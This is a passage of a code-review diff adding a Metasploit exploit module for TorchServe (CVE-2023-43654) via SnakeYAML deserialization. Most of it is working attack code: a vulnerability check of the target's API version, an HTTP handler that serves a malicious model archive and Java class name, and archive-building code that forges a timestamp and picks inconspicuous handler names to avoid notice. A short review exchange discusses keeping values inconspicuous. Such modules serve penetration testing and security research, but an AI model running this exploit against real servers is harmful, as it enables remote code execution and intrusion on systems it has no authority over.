modules/exploits/multi/http/torchserver_cve_2023_43654.rb

```diff
@@ -0,0 +1,153 @@
+        [ 'URL', 'https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in' ],
+        [ 'URL', 'https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858' ]
+      ],
+      'DisclosureDate' => '2023-10-03',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8081
+      },
+      'Targets' => [
+        [
+          'Automatic', {
+            'Platform' => 'java',
+            'Arch' => [ARCH_JAVA]
+          }
+        ],
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'api-description'))
+    return Exploit::CheckCode::Unknown unless res
+    return Exploit::CheckCode::Safe unless res.code == 200
+    unless res.get_json_document.dig('info', 'title') == 'TorchServe APIs'
+      return Exploit::CheckCode::Safe('The TorchServe API was not detected on the target.')
+    end
+
+    version = res.get_json_document.dig('info', 'version')
+    return Exploit::CheckCode::Safe unless version.present?
+    unless Rex::Version.new(version) < Rex::Version.new('8.0.2')
+      return Exploit::CheckCode::Safe("Version #{version} is patched.")
+    end
+
+    Exploit::CheckCode::Appears("Version #{version} is vulnerable.")
+  end
+
+  def class_name
+    'MyScriptEngineFactory'
+  end
+
+  def constructor_class
+    ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class"))
+  end
+
+  def on_request_uri(cli, request)
+    if request.relative_resource.end_with?("#{@model_name}.mar")
+      print_good('Sending model archive')
+      send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory')
+      vprint_good('Sending ScriptEngineFactory class name')
+      send_response(cli, class_name, { 'Content-Type' => 'application/octet-string' })
+      return
+    end
+
+    super(cli, request)
+  end
+
+  def generate_mar
+    config_file = rand_text_alphanumeric(8..15) + '.yml'
+    serialized_file = rand_text_alphanumeric(8..15) + '.pt'
+
+    mri = Rex::Zip::Archive.new
+    mri.add_file(serialized_file, '') # an empty data file is sufficient for exploitation
+    mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({
+      'createdOn' => (Time.now - Random.rand(600..1199)).strftime('%d/%m/%Y %H:%M:%S'), # forge a timestamp of 10-20 minutes ago
+      'runtime' => 'python',
+      'model' => {
+        'modelName' => @model_name,
+        'serializedFile' => serialized_file,
+        'handler' => %w[image_classifier object_detector text_classifier image_segmenter].sample,
+        'modelVersion' => '1.0',
```

Comment:
Can this number be randomized?

Reply:
Probably but 1.0 seems like a sufficiently inconspicuous value.